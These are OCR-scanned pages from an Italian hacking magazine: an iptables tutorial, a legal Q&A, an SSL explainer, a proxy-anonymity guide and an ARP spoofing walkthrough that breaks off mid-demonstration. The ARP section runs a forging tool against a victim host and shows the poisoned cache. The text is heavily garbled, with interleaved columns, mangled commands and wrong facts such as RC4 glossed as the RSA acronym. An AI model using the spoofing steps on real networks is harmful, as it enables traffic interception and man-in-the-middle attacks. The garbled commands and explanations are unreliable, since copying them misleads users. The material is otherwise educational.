zione -i per specificare l'interfac- 



iptables -A INPUT - i ethO -s 0/0 - 
d 0/0 -protocl icmp-type echo- 
reply -j REJECT 

iptables -A INPUT - i ethl -s 0/0 - 
d 0/0 -protocl icmp-type echo- 
reply -j REJECT 

Questo comando consente tutto il 
traffico ICMP su una rete, ma non 
li inoltra con un pacchetto echo- 
reply (addio ping). 
Un'altra cosa importante: le politi- 
che sono impostate di default su 
Accept, ma sarebbe preferibile 



Tabella Catene Predefinite 



filter INPUT FORWARD 

Nat PREROUTING OUTPUT POSTROUTING 

Mangle PREROUTING OUTPUT POSTROUTIN 



Descrizione 



Filtra i pochetti 

Abilita Mascheramento 

Ga Itera i pacchetti 



tena personalizzata e modifcarla 
poi a vostro piacimento, così: 

iptables -N custom 

iptables -A custom -s 0/0 -d 0/0 - 

p icmp -j DROP 

iptables -A input -s 0/0 -d 0/0 -j 

custom 

Nell'esempio, l'opzione A aggiun- 
ge una regola collocandola all'ini- 
zio della catena; l'opzione -I ag- 
giunge la regola alla fine della 
catena, e in seguito aggiunge una 
regola che respinge tutti i pac- 
chetti ICMP in entrata. 
(DROP = Respingere ACCEPT = 
Accettare) 

In router o firewall ci possono pe- 
rò essere diverse schede di rete: 



prima impostare tutto su Drop, e 
poi impostare solo quello che vi 
serve su Accept. In questo modo i 
itera di menticare qualche porta 
aperta. 

iptables -P input DROP 

Per visualizzare le regole imposta- 
te finora, potete digitate quanto 
segue: 

iptables -L 

Siccome iptables ha tre tabelle, 
potete scegliere di visualizzarne 
solo una con: 

iptables -t nat -L 

Se poi volete visualizzare solo una 
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:atena di una tabella, usate: 
ptables -t nat -L FORWARD 

volete inoltre salvare il risul- 
to su un file (cosa consigliata 
per possbili problemi seguenti) 
potete usare questo comando: 

/sbin/i ptables- sa ve > 

iptables.txt 

(Attenzione: le versioni prece- 
denti alla 1.2. la non supporta- 
no questa opzione) 

Inoltre, nel caso il vostro script 
personalizzato parte a ogni av- 
vio del computer per impostare 
le regole del firewall potete ag- 
giungere la seguente stringa 

iptables -F 

che cancella tutte le regole im- 
postate in Filter, ma non quelle 
in NAT o Mangle, che bisogna 
cancellale così: 

iptables -t nat -F 



» Mascheramneto in 
iptables 

Tuttavia, per cancellare solo 
una catena di filtere si usa sem- 
pre il comando iptables -F ma 
con il nome della catena (per 
esempio INPUT). 
I servizi utilizzati da Internet, 
come FTP, richiedono un suppor- 
to aggiuntivo. Iptables fornisce 
vari moduli per il maschera- 
mento, che consentono di acce- 
dere a queste risorse: 



Mini firewall 



Se il vostro scopo è protegere un 
computer direttamente connesso a 
internet tramite un modem di casa 
(insomma se non è una rete azien- 
dale) potete costruirvi un sempli- 
cissimo firewall personale creando 
un banalissimo script. 
Per esempio, per bloccare il ping 
sul vostro computer e registrare i 
tentativi di ping su un log basterà 
creare il seguente script: 

#!bin/sh 

echo"1" >> 

/proc/sys/net/ipv4/icmp_echo_igno 

re_all 

exitO 

(Per ulteriori informazioni riguar- 
do agli script leggetevi il mio tuto- 
rial all'indirizzo 
http://accessdenied85.cjb.net). 



Il comando per richiamare i mo- 
duli è il seguente: 

/sbin/insmod *nomemodulo* 

Per mascherare l'IP si usa il se- 
guente comando : 

iptables -t nat -A POSTROUTING 

-d ! 192.168.1.0/22 -j MASCHE- 

RADE 

iptables -t nat -A POSTROUTING 

-d ! 10.100.100.0/24 -j MASCHE- 

RADE 



ip_masq_ftp 

ip_masq_raudio 
ip_masq_irc 
ip_masq_vdolive 
ip_masq_cuseeme 



bles fornisce Questa regole viene aggiunta al- 

I maschera- la catena postrouting (-A) della 

tono di acce- tabella nat (-t). Con il punto esla- 

se: mativo si dice a iptables di ma- 

scherare tutti i pac- 
chetti non diretti a 
192.168.1.0 porta 

22 e 10.100.100.0 
Modulo per il mascheramento porta 24 Come im _ 

delle connessioni FTP postazione predefi- 
Per il Real Audio nita, iptables usa la 
per IRC prima scheda di re- 
Perle connessioni VDO Live te - Per modificare 



l'opzione -o. Questa opzione pe- 
rò lascia la rete scoperta, perchè 
se un cracker vuole entrare nell'- 
host della rete interna, gli baste- 
rà digitare l'IP del firewall per 
avere una connessione diretta (le 
cose sono in realtà leggermente 
più complicate). Per evitare que- 
sto, applichiamo le regole di ma- 
scheramento solo alla rete inter- 



iptables -A FORWARD -s 
192.168.1.0/24 -i ACCEPT 
iptables -A FORWARD -d 
192.168.1.0/24 -i ACCEPT 
iptables -A FORWARD -s 
10.100.100.0/24 -i ACCEPT 
iptables -A FORWARD -d 
10.100.100.0/24 -i ACCEPT 
iptables -A FORWARD -j DROP 

Come dicevamo all'inizio, con 
questi strumenti è anche possibile 
registrare i pacchetti respinti, in 
modo da avere un log da esami- 
nare, alla ricerca di tracce di un 
attacco o per risolvere problemi 
sulla rete. Nei prossimi numeri 
vedremo esattamente come fare. 

:: AccE$$DeniEd :: 
http://accessdenied 



Per CU-See Me 



iJS 




1 VI 


J 


r'*ÉÉ 




WÉ 


1 


m 



www.hackerjournal.it |22 



'Euitiamo di finire 



i può Tare o no 

H uolte non è semplice tirare la linea che separé un 

comportamento legittimo da un reato. 

Ecco le risposte di TuonoBlu ai uostri dubbi legali 



» Mp3 legittimi? 

Ho un lettore portatile di Mp3 con hard disk 
che mi ha cambiato la vita: posso finalmen- 
te portarmi a spasso gran parte della mia 
collezione musicale senza dover trasportare 
un armadio. Quasi tutti i file Mp3 che pos- 
seggo li ho estratti personalmente dai miei 
CD, e quindi da quanto mi risulta il loro 
possesso e utilizzo sono perfettamente lega- 
li. Possiedo però anche svariati dischi 
su vinile. Il procedimento di acquisizione e 
conversione in Mp3 sarebbe lungo, labo- 
rioso e porterebbe a risultati piuttosto sca- 
denti. Se io quindi scaricassi gli Mp3 
degli album di cui possiedo una copia 
in vinile e li conservassi per ascoltarli, 
commetterei comunque un reato? 



diversi motivi: 

1) benché scaricato da Internet, il brano è 
comunque una copia dell'originale 
detenuto legittimamente, sebbene pro- 



2) l'uso personale di opere musicali 
non è previsto dalla legge come rea- 
to, essendo richiesto il fine di lucro (derivan- 
te, per esempio, dalla vendita); 



Chi è TuonoBlu? 

E abbastanza chiaro che dietro al 
nick TuonoBlu si cela un avvocato, 
ma qual è il suo vero nome? Vedia- 
mo come ve la cavate con le investi- 
gazioni in Rete: provate a scoprire 
di chi si tratta, e scriveteci la rispo- 
sta a redazione@hackerjournal.it. 
I primi tre a dare la risposta corret- 
ta riceveranno in omaggio una co- 
pia di un suo libro relativo a doc- 
king e criminalità (il titolo non ve lo 
diciamo, sennò è troppo facile...). 



3) in ogni caso è tuttora in vigore la legge 5 
febbraio 1992, n. 93, che prevede, all'art. 3, 
co. 1, che "gli autori e i produttori di fono- 
grammi, i produttori originari di opere audio- 
visive e i produttori di videogrammi, e loro 
aventi causa, hanno diritto di esigere, quale 
compenso per la riproduzione privata per uso 
personale e senza scopo di lucro di fono- 
grammi e di videogrammi, una quota sul 
prezzo di vendita al rivenditore dei na- 
stri o supporti analoghi di registrazione 
audio e video (musicassette, videocassette e 
altri supporti) e degli apparecchi di registra- 
zione audio". 

» Abuso di legittima 
difesa? 

Vi voglio porre un quesito, ho un portatile che 
utilizzo sia sul lavoro che a casa. Ora, dato 
che è associato un indirizzo ip pubblico, rice- 
vo regolarmente dai 10-15 attacchi al 
giorno, sia su porte udp, che su http (è in- 
stallato un ftp server per scopi lavorativi). 
Spesso la maggioranza degli attacchi sono 
da parte di server con il virus Nimda, che mi 
stressano in continuazione, per fortuna ho zo- 
ne allarm che li blocca, ma quando diventato 
insistenti tipo 10-15 al di, allora eseguo un 
tracert per vedere un pò meglio chi è. Poi, tra- 
mite languard, entro nel pc, cercando di 
capire che ca**o vuole da me. Ormai mi 
rendo conto quanto è infettato da nimda (tut- 
to il disco risulta essere condiviso). Quindi, 
entro nel suo disco, e sotto la cartella esecu- 
zione automatica, gli metto un file txt con 
dentro ravviso che il server è infettato, 
dopodiché gli mando in shutdown (se 
possibile) il sistema. 
Facendo ciò mi tutelo dai suoi continui attac- 
chi, e tutelo anche il server che mi attacca. 
La domanda è: ma facendo cosi, commetto 
qualche reato o no? 



Indipendenti 
portamento (che non rileva ai fini della perpe- 
trazione del reato) il lettore si sta rendendo re- 
sponsabile di accesso abusivo ad un sistema 
informatico, condotta prevista e punita dal- 
l'art. 615 ter del Codice Penale. 
Il comportamento corretto da tenere in questi 
casi è quello di limitarsi a individuare l'elabo- 
ratore da cui parte l'assalto (senza neppure 
tentare di accedervi, visto che anche tale con- 
dotta è punibile) e comunicare al titolare (o al- 
le Forze dell'Ordine, se quest'ultimo non è rin- 
tracciabile) tutte le informazioni del caso. 

» Conseguenze dei 
sequestri 

Ho visto molte volte siti pirata chiusi perchè 
contenenti materiale illegale. Ma la "giusti- 
zia" si limita a chiuderlo oppure si han- 
no anche dei problemi in futuro (fedina 
penale, processi, eccetera)? 



Ogni sequestro penale è preceduto o seguito 
(a seconda del tipo di provvedimento adotta- 
to dall'autorità giudiziaria) un procedimen- 
to penale, che può concludersi, ovvia- 
mente, con l'assoluzione o la condan- 
na. Il discorso è diverso in caso di provvedi- 
mento cautelare ex art. 700 c.p.c. Questo 
provvedimento si applica in processi civili, che 
potrebbero anche non iniziare se le parti (l'at- 
taccante e il danneggiato) trovano un accor- 
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SICUREZZA . ■ 



COME FUNZIONANO LE CONNESSIONI CIFRATE PER WEB, TELNET E FTP 



reti di SSL 



Torniamo ad esaminare Secore Socket Layer ono dei protocolli di cifratora 
più dif fosi per il Web e le connessioni Telnet. 




bbiamo già parlato si SSL, 
con Onda Quadra nel nume- 
ro 2, e l'argomento ha susci- 
tato un grande interesse. Ve- 
diamo quindi di spulciare tra 
le pieghe di Secure Socket La- 
yer per comprenderne il fun- 
zionamento nei minimi dettagli. Il protocol- 
lo SSL (Secure Socket Layer) è un prodot- 
to di Netscape, ma è supportato anche da 
altri browser. Questo protocollo garantisce 
la privacy delle comunicazioni su internet e 
permette di far comunicare un client con un 
server in modo sicuro e privato, e infatti 
questo protocollo è molto utilizzato per con- 
nessioni dove c'è bisogno di inviare infor- 
mazioni riservate, come per esempio il nu- 
mero di carta di credito o nomi utene e pas- 



» Priuacy 



Sono molti gli aspetti che rendono sicu- 
ro e affidabile questo protocollo, e vale la 
pena di esaminarli in dettaglio. 

Il sistema di cifratura parte da dopo lo 
handshake fino alla fine della connessione 
poiché anche i dati inviati vengono critto- 



grafati e per questo viene utilizzata la critto- 
grafia simmetrica (DES e RC4) 

DES: è l'acronimo di Digital Encryption 
Standard, un algoritmo di criptazione che 
usa chiavi a 64bit, non ha un elevata po- 
tenze! di calcolo in confronto alle attuali. 
Ciononostante, questo algoritmo è molto 
usato, spesso nella sua variante Triple-DES, 
basata sull'uso di DES ripetuto per tre volte. 

Con questo standard il testo in chiaro in 



input e il Testo citrato in uscita nanno una 
lunghezza standard di 8 byte. L'input deve 
quindi essere un multiplo di questo blocco 
elementare; se la lunghezza del messaggio 
non corrisponde a un multiplo di questa 
grandezza, deve essere imbottito di dati, fi- 
no ad arrivare alla misura necessaria per 
operare in modo CBC o ECB correttamen- 
te. 

La chiave di cifratura è formata da 56 
bit casuali e 8 bit pari, che vanno a com- 
porre una chiave a 64 bit. 

ÌDES: Questo metodo è figlio del pre- 
cedente e consiste nell'esecuzione del DES 
per tre volte consecutive, per triplicare il nu- 
mero di bit nella chiave di cifratura . Sono 
molti i sistemi che supportano questo meto- 
do. Questa tecnica è conosciuta come EDE 



(Encrypt-Decrypt-Encrypt), il processo di 
decodifica può essere reso compatibile con 
il precedente, fermando il meccanismo a 
metà. 

Se le tre chiavi usate sono le stesse, il Tri- 
ple DES è equivalente a un singola cifratura 
DES; con questo metodo un'applicazione 
che può usare solo il DES, è in grado di co- 
municare con un'altra che sta usando il ~ * 
pie DES. Se invece le tre chiavi sono diffe- 
renti, la decrittazione mezzo disturberà il 
messaggio opposto ed esso non decifrerà il 
primo stadio. 

RC4: un algoritmo della RSA Data Se- 
curity, Inc. Originariamente le specifiche 
progettuali delliRC4 erano segrete, ma nel 
1994 sono state divulgate. 

Questo algoritmo è molto utilizzato in 
vari tipi di applicazioni. L'RC4 usa la chia- 
ve fornita dagli utilizzatori per produrre 
una sequenza numerica pseudo-casuale; 
essa è legata al vettore XOR con i dati di 
input. 

Questo significa che le operazioni di 
crittazione e di decrittazione sono identi- 
che. Il numero di bit della chiave è varia- 
bile: va da un minimo di 8 ad un massimo 
di 2048. Il codice usato da questo sistema 
ha una lunghezza dieci volte inferiore ri- 
spetto al DES (minore sicurezza), ma il 
vantaggio sta nella velocità di esecuzione 
(circa 5 volte più veloce). Non ci sono at- 
tacchi conosciuti nei suoi confronti. La ver- 
sione internazionale dell'RC4 a 40 bit è 
stata violata con il metodo a forza bruta in 
8 giorni da ben due associazioni. 

» Autenticazione 



Questo processo viene attuato utiliz- 
zando sistemi di cifratura asimmetrie 
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a chiave pubblica come RSA e DSS. In 
questo modo si è sicuri di comunicare di- 
rettamente con il server giusto (l'autenti- 
cazione è richiesta sia dal server che dal 



RC4: è l'acronimo di Rivest Shamir 
Adelman questo algoritmo è considerato 
molto sicuro se si usano chiavi lunghe co- 
me da 768 bit o 1024, questo algoritmo 
a chiave pubblica è il più usato sia per ci- 
frare che per le firme digitali. Il suo fun- 
zionamento è simile a questo 



1 . A genera due numeri primi grandi p e q ; 

2. A calcola n = p q e f(n) = (p - 1 )(q - 1 ) ; 

3. A sceglie un numero 1 < e < f(n) tale che 
gcd(e,f(n)) = l; 

4. A calcola d = e-1 mod f(n) usando lialgo- 
ritmo di Euclide Esteso; 

5. A pubblica n ed e come sua chiave pub- 
blica PA = (e, n). 

6. A conserva ned come sua chiave privata 
SA = (d, n). 



DSS: è l'acronimo di Digital Signa- 
ture Standard non è molto affidabile e 
utilizzato solo per la firma e non è stato 
ancorareso del tutto pubblico. 



» Multipiattaforma 

SSL è multipiattaforma, e lavora su 
Win come su Solaris. 

In passato il governo americano im- 
poneva pesanti limitazioni all'utilizzo 
delle tecniche di crittografia "forti", per 
cui non si potevano impiegare chiavi 
più lunghe di 40 bit. 

Oggi queste limitazioni sono cadu- 
te, ed è finalmente possibile scaricare e 
utilizzare legittmamente browser che 
supportano le chiavi lunghe. 

Handshake e analisi dei processi 

Inanzitutto i protocolli usati durante la 
sequenza di handshakesono: 



"SSL Handshake Protocol" per stabilire 
una sessione tra il client ed il server 

"SSL Change Cipher Spec protocol" per 
concordare la Cipher Suite per la ses- 



"SSL Alert Protocol" per comunicare i mes- 
saggi di errore SSL tra client e server. 
Vediamo come funziona una connessione 
(client -> server) con SSL 



Nella prima parte il client e il server 
concordano sulla versione delprotocollo e 
sugli algoritmi di crittografia da usare, e 
poi usano la cifratura a chiave pubblica 



Vediamo il tutto più in dettaglio: il 
client spedisce al server un hello e que- 
st'ultimo risponde allo stesso modo (con 
un server hello), questo ha un valore im- 
portante infatti durante questa fase ven- 
gono stabiliti: 

protocol version, cipher suite, session ID e 
compression method 
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Se durante qu ._._„ „,_„.„„__. .„... 

sce o va storto, la connessione viene inter- 
rotta... a questo punto il server manda un 
messaggio di server hello done questo 
per indicare al client che la fase hello 
message dell'handshake è terminata con 
successo e attende una risposta positiva 
dal client. 

A questo punto si scambieranno i dati 
di cui abbiamo parlato sopra. 

La fase di handshake è finita, e duran- 
te la connessione il server può mandare 
svariati hello request anche se questi ver- 
ranno ignorati dal client. 

Al contrario, il client può mandare 
a sua volta dei client hello per rinego- 



stente. Un completo esempio di hands- 
hake è questo: 



Client > ClientHello > Server 

Client < ServerHello < Server 

Client < Certificate < Server 



Client < Certificate request <- 

Server 

Client < ServerHelloDone <- 

Server 



Client > Certificate > Server 

Client > Certificate verify > Server 

Client > ChangeChiperspec > 

Server 

Client > Finished > Server 



Client < ChangeChiperspec <- 

Server 

Client < Finished < Server 



Il client hello ha una struttura come 



struct { 

ProtocolVersion client_version; 

Random random; 

SessionlD sessionjd; 

CipherSuite cipher_suites<2..215>; 

Compression Method compression _me- 

thods<1..27>; 

} ClientHello; 



mentre il server hello ha una struttura co- 
me questa: 



struct { 

ProtocolVersion server_version; 

Random random; 

SessionlD sessionjd; 

CipherSuite cipher_suite; 

CompressionMethod compression_me- 

thod; 

} ServerHello; 



ierver_version: contiene la versione 
del protocollo 

«Bandoni: è una struttura completa- 
mente casuale generata dal server che 



i 



fi_method: il metodo di 
cessione dato dal server 

na chiper suite è definita da tre com- 

nti: 

ìTodo di scambio della chiave 
"oritmo di cifratura per il trasferimen- 

i dati 
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COME FUNZIONANO LE CONNESSIONI CIFRATE PER WEB, TELNET E FTP 







- Message Digest per la creazione del 
MAC (Message Autentication Code)B 

1. Metodo di scambio della chiAe: 

Il metodo di scambio della chiave serve 



mentre la versione successiva SSL 3.0 
supporta vari algoritmi di scambio. 

2. Algoritmo di cifratura per il tra- 
sferimento dei dati 



Per la citi 
SSL usa algoritmi di crittogra- 
fia simmetrica. Si possono ef- 
fettuare ben otto scelte: 



Cifratura Blocchi 

.RC4 con chiave di 40-bit 
.RC4 con chiave di 128-bit 

Cifratura Blocchi 

.RC2 con chiave di 40-bit 
.DES40, DES, 3DESJDE. 
.Idea 
.Fortezza 

Eventualmente, è anche possibile non 
eseguire alcuna cifratura. 

3. Message Digest per la creazione del 
MAC 

Questo determina come verrà creata 
l'impronta digitale dal record. 
Le scelte sono tre: 



SSL 




All'indirizzo www.openssl.org si trovano le specifi- 
che e i sorgenti di OpenSSL, un'implementazione 
Open Source di SSL. 



succede molto spesso). 

Client certificate: Il client dopo avere 
ricevuto un server hello done manda il 
suo certificato. 

Secret Premaster message (RSA): Il 

client genera un messaggio premaster di 
48 byte usando l'algoritmo a chiave pub- 
blica del server che ha una struttura come 
questo: 



L'uso di RC4 cln chiavi di 40 bit sem- 
brerebbe una cosfl poco sicura e in effetti 
è così. 

Qua in ita 
degli USA sull'es^..^.^..^ ^ y .. u,^,,,- 
mi di crittazione. I 

Molti altri bachi sono stati scoperti su 
Come al solito, bug- 
traq è un ottimo strumento per tenersi ag- 
giornati. 

Prima di lasciarvi volevo dire due ulti- 
me cose molto imr 

1. Il protocollo SSL non è un protocollo in- 
dipendente ma si appoggia ad un altro 
protocollo, il TCP/IR 



ovunque e molto 



SSL-telnet: 




struct { 

ProtocolVersion client_version; 

opaque random[46]; 

} PreMasterSecret; 



Client_version e random sono cose già vi- 
ste prima 

Pre_Master_Secret : è il valore gene- 
rato a random dal client usato per gene- 
rare il master secret vero e proprio 



SSL-ftp: 

ftp://ftp.psy.uq.oz.clj/pub/Crypto/SSLapps/ 

www.eviltime.com 



MD5, con hash a 1 28-bit struct { 

SHA (Secure Hash Algorithm) con hash a I public-key-encrypted PreMasterSecret 

160-bit | pre_master_secret; 

} E ncrypted PreMasterSecret; 



o anche qui, si può evitare di sce 
alcuna impronta. 




Server certificate: per una mai 

sicurezza, durante l'handshake il server 
invia il cosiddetto "server certificate" ovve- 
ro il certificato che viene inviato subito do- 
po il server hello. 

Se il server non dispone di un certifica- 
to, allora manda un messaggio di server 
key exchange. Il server potrebbe anche 
chiedere un "certificate request", ovvero un 



» SSL=sicurezza? 

In teoria, la risposta dovrebbe essere 
SI, ma la pratica è cosa ben diversa infat- 
ti SSL riporta varie falle e può essere "fa- 
cilmente" (si fa per dire) violabile con me- 
todi come: 
Crittanalisi 
Forza bruta 
Replay 



1 
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COME USARE IL PROGRAMMA MULTIPROXY 



Nauigare anonimi con 

Siete stufi di douer spippolare ogni uolta ITI 1 1~| j ITI fi ^ fri ^ 7 fi 

le impostazioni dei pro«y per potersi 

garantire un po' di sano anonimato in rete? Ecco il programma che fa per uoi! 



^^^^ rf 



i sa che ogni volta 
che si visita un sito, 
questo potrà ottene- 
re su di noi tutta una 
serie di informazioni, a partire dall'indi- 
rizzo IP (dal quale si può risalire a gran- 
di linee alla posizione geografica), fino 
all'indirizzo di provenienza, il sistema 
operativo e il browser utilizzati. 
Uno dei metodi più usati per nasconde- 
re le proprie tracce è l'utilizzo di un ser- 
ver proxy, un computer intermedio tra 
noi e il destinatario della connessione. 
Invece di vedere le nostre "impronte di- 
gitali" (nel senso più moderno della pa- 
rola), il sito visitato vedrà l'indirizzo e le 
informazioni relative al Proxy. 
I proxy possono essere utilizzati 
da un'interfaccia Web (come quella 
di anonymizer.com) o modificando le 
impostazioni di rete (o quelle del 
browser). Il problema nell'ultimo caso è 
che molto spesso i proxy server nascono 
e muoiono nello spazio di pochi giorni, 
oppure in certi momenti sono così affol- 
lati da essere quasi inutilizzabili, e quin- 
di bisogna modificare spesso cercarne 
uno che funzioni e modificare le impo- 
stazioni. 

Insomma, dopo un po' la cosa potrebbe 
diventare scocciante. Se non avete esi- 
genze da 007, potrebbe essere molto 
utile l'utility MultiProxy, che mantiene 
una lista di proxy che vengono control- 
lati per verificarne l'affidabilità e la ve- 
locità ogni volta che si avvia il pro- 
gramma. Provvederà lui a ordinarli per 
velocità, eliminare quelli non attivi (o 
non sicuri) e a selezionare di volta in 
volta il migliore. 

Come al solito, la prima cosa 
da fare è scaricare il program- 
ma dall'indirizzo www.multi- 
proxy.org, e installarlo sul pro- 
prio computer con un doppio clic sul file 
.exe che si ottiene dopo aver scompatta- 
to N'archivio .zip scaricato. 




Come seconda cosa, bisognerà 
procurarsi una lista di proxy ag- 
giornata. Quella presente sul sito 
è stata modificata l'ultima volta in 
maggio; per qualcosa di più recente, potete 
provare su www.atomintersoft.com/ 
products/alive-proxy/proxy-list/, 
avendo cura di scegliere soli proxy anonimi. 

Aprite il Blocco Note e Create un 
file di testo che contenga gli indi- 
rizzi dei proxy, uno per riga. Do- 
| pò aver aperto MultiProxy con un 
doppio clic sulla sua icona, fate clic su Op- 
tions, poi sulla linguetta Proxy servers list. Fa- 
te clic con il tasto destro del mouse e sele- 
zionate il comando Import Proxy List dal me- 
nu Files, selezionando il file che avete appe- 
na creato. 
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Chiudete per ora la finestra Op- 
tions, e dalla finestra premete il 
IIm J pulsante Check ali proxies: ve- 
drete partire un contatore sulla 
sinistra, che mostra lo stato di avanzamento 
della verifica delle condizioni dei vari server. 
Attendete che arrivi alla fine. Nella finestra 
Proxy Servers list dovrebbe ora comparire la 
lista dei proxy, con un pallino verde su quel- 
li attivi e uno rosso su quelli inattivi. 




Aprite ora il browser e, nelle im- 
postazioni del proxy http, inserite 
l'indirizzo 127.0.0.1 porta 8088. 
Con Internet Explorer 6, selezio- 
nate Opzioni Internet dal menu Strumenti, 
fate clic sulla linguetta Connessioni. Se vi 
collegate a Internet con una Lan, potete in- 
serire le impostazioni del proxy direttamente 
nella finestra Connessioni, altrimenti sele- 
zionate la connessione di Accesso Remoto 
desiderata, premete il pulsante Impostazio- 
ni, spuntate la casella Utilizza un server 
proxy e inserite l'indirizzo come sopra. 




A questo punto, ogni volta che richiede- 
rete un indirizzo Internet dal vostro bro- 
wer, questo non lo contatterà direttamen- 
te, ma farà una richiesta a MultiProxy, 
che vi collegherà al più veloce proxy del- 
la sua lista, permettendovi una naviga- 
zione finalmente riservata. 
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COME DIROTTARE PACCHETTI DENTRO A UNA RETE LOCALE 



Spoofing dei pacchetti HRP 

Cerchiamo di comprendere come è possibile portare attacchi direttamente al 
meccanismo di smistamento dei pacchetti di una LflN 




a 



ual è la più grande vulnerabilità di una LAN? Pro- 
babilmente è il fatto che sia possibile falsificare 
pacchetti ARR Grazie a questo, si può far credere 
che delle macchine appartengano a una certa rete, 
mentre questo non è vero, ridirezionando TUTTO il 
traffico Ethernet. Come può essere sfruttata questa 
vulnerabilità? In molti casi un attaccante la userà 
per monitorare il traffico di rete. Oppure potrebbe utilizzarla 
per un attacco Denial of Service o per interporsi in una co- 
municazione, intercettandola (attacco "man in the middle"). 

» Cos'è l'flRP? 



L'ARP è l'Address Resolution Protocol e serve a mappare gli in- 
dirizzi IP a indirizzi ethernet (MAC). Quando viene trasmesso 
un pacchetto IP in una rete, il sistema deve sapere a quale 
macchina fisicamente attaccata alla LAN deve mandare que- 
sto pacchetto (se al router o un altro host nella rete). Quindi 
"chiede" alla LAN chi ha TIP x.x.x.x e qualcuno risponderà 
x.x.x.x si trova alla scheda di rete che ha indirizzo MAC 
xx:xx:xx:xx:xx:xx. In questo modo si può completare l'header 
datalink (802.3) e il pacchetto può essere inviato. Questo me- 
todo è simile al DNS, che serve per associare il numero IP a 
un certo indirizzo del tipo nomehost.nomedominio.it. Se vo- 
glio mandare un pacchetto a nasa.gov, io "chiedo" (in questo 
caso al NS auth di nasa.gov) Tip che corrisponde a nasa.gov. 
Posso quindi completare il header IP e mandare il pacchetto. 
Ci sono 2 tipi di pacchetti arp: arp request e arp reply. Illu- 
striamo il concetto con tcpdump: 



192.168.1.2 vuole mandare un icmp echo a 
192.168.1.154: 

#ping -e 1 192.168.1.154 

PING 192.168.1.154 (192.168.1.154): 56 octets data 
64 octets from 192.168.1.154: icmp_seq=0 ttl=255 ti- 
me=3.0 ms 

tcpdump: 

15:19:26.217004 0:1 0:a4:c0:1 5:92 ff:ff:ff:ff:ff:ff 0806 42: 
arp who-has 192.168.1.154 teli 192.168.1.2 
15:19:26.217563 0:80:c8:7a:39:14 0:1 0:a4:c0:1 5:92 
0806 64: arp reply 192.168.1.154 is-at 0:80:c8:7a:39:14 
15:19:26.217608 0:1 0:a4:c0:1 5:92 0:80:c8:7a:39:14 
0800 98: 192.168.1.2 > 192.168.1.154: icmp: echo re- 
quest (DF) 

15:19:26.218351 0:80:c8:7a:39:14 0:1 0:a4:c0:1 5:92 
0800 102: 192.168.1.154 > 192.168.1.2: icmp: echo 
reply 

Il primo pacchetto è "dite a 192.168.1.2 il mac 
192.168.1.154". Ovviamente è un pacchetto broadcast 
(ff:ff:ff:ff:ff:ff) perché sta "cercando" l'host. 
L'host risponde con un pacchetto unicast dicendo "192.168.1 .154 
si trova all' indirizzo 0:80:c8:7a:39:14" 

A questo punto può essere mandato il pacchetto ICMP Proprio co- 
me succede con il DNS, se uno esegue telnet nasa.gov. Prima il 
pacchetto UDP alla 53 e poi il syn alla 23. Se ora viene manda- 
to un altro ICMP a 192.168.1.154 noterete che NON ci sarà 
un'altra richiesta ARR Gli ARf^ come gli host dei NS, vengono me- 
morizzati in cache: 

root:~# arp -na 

(192.168.1.154) at 00:80:C8:7A:39:14 [ether] on ethO 
root:~# 

Ogni tanto i dati in cache "scadono", e quindi bisogna mandare un 
altra richiesta. La cache naturalmente serve a non sovraccaricare la 
rete di pacchetti ARR 



» Come sono formati i pacchetti HRP 



Ecco come viene costruito un pacchetto ARP; il codice è preso da 






struct arphdr 

{ 

unsigned short arhrd; /* format of hardware address */ 
unsigned short ar_pro; /* format of protocol address */ 
unsigned char arhln; /* length of hardware address */ 
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unsigned char arpln; /* length of protocol address */ 
unsigned short arop; /* ARP opcode (command) */ 



Ethernet looks like this : This bit is variable sized 
however... 

/ 

unsigned char ar_sha[ETH_ALEN]; /* sender hardware 
address */ 

unsigned char ar sip[4]; /* sender IP address 
7 

unsigned char ar_tha[ETH_ALEN]; /* target hardware 
address Vunsigned char ar tip[4]; /* target IP address 
V 
#endif 



» HRP Reply 



Format e length non ci interessano (arp NON è solo per as- 
sociare indirizzi ethernet e IP: è un protocollo generico, an- 
che se qui parleremo solo di IP). Ar_op è ARP request o reply. 
"Sender hardware address e IP" (indirizzo 
MAC di chi invia la richiesta e IP corri- 
spondente), e "target hardware e ip" 
sono le parti più interessanti del pac- 
ìetto. Sender hardware e Sender IP 
estano sempre TIP e il MAC di co- 
lui che manda il pacchetto. Se 
invece il pacchetto è request, 
target hardware viene riem- 
pito con lo (perché non 
si conosce) e target ip 
^K è l'ip di cui voglia- 

mo sapere l'- 
ha rdwa re ad- 
dress. Nel 



reply viene semplicemente riempito il target hardware, modi- 
ficato l'opcode e rimandato indietro. 

Il sistema operativo sa dove mandare i pacchetti grazie appunto 
alla tabella ARP (la cache). Quest'ultima viene aggiornata e cam- 
biata dai pacchetti ARR Iniziamo a mandare un po' di pacchetti 
finti e vediamo cosa succede... in teoria quando viene inviata un 
ARP request, se io mando un reply con il MIO mac address, il si- 
stema pensa di collegarsi ad X ma in realtà si collega a me. Di- 
ciamo in parole semplici che se io mando un NS reply che affer- 
ma che l'indirizzo di nasa.gov è 192.168.1.2, l'host pensa che si 
collega a nasa.gov ma in realtà si collega a 192.168.1.2 ;). 
Vediamo un semplice esempio: 

192.168.1.154 (la vittima) vuole collegarsi a 192.168.1.2 
(che in realtà non esiste). 

root@DigitalF:~# ping -e 1 192.168.1.2 

PING 192.168.1.2 (192.168.1.2): 56 octets data 

non torna nulla perché non riceve ARP reply 

29:36:41.323528 0:80:c8:7a:39:14 ff:ff:ff:ff:ff:ff 0806 64: 
arp who-has 192.168.1.2 teli 192.168.1.154 (senza 
reply) 



root@DigitalF:~# arp -na 
(192.168.1.2) at incomplete > on ethO 
(192.168.1.1) at 00:1 0:A4:C0:1 5:92 [ether] on ethO 
root@DigitalF:~# 

proviamo invece a mandare un finto reply da 192.168.1. 
(che ha mac 00:1 0:A4:C0:1 5:92): 

# ./arp <dev> <srcmac> <dstmac> <arp op:1req 
2 rep> <srcmac> <srcip> <dstmac> <dstip> <de- 

I iay> 




# ./arp ethO aa:aa:aa:aa:aa:aa ff:ff:ff:ff:ff:ff 2 

00:1 0:A4:C0:1 5:92 192.168.1.2 aa:bb:bb:bb:bb:bb 

192.168.1.30 10000000 

DELAY= 10000000 

SENT 

# 

root@DigitalF:~# arp -na 

? (192.168.1.2) at 00:1 0:A4:C0:1 5:92 [ether] on ethO 

? (192.168.1.1) at 00:1 0:A4:C0:1 5:92 [ether] on ethO 

root@DigitalF:~# 



» hi ^ n ; 



Ora 192.168.1.154 (DigitalF per capirci...) crede che 
192.168.1.2 sia 00:1 0:A4:C0:1 5:92 

ora proviamo a trasmettere... 

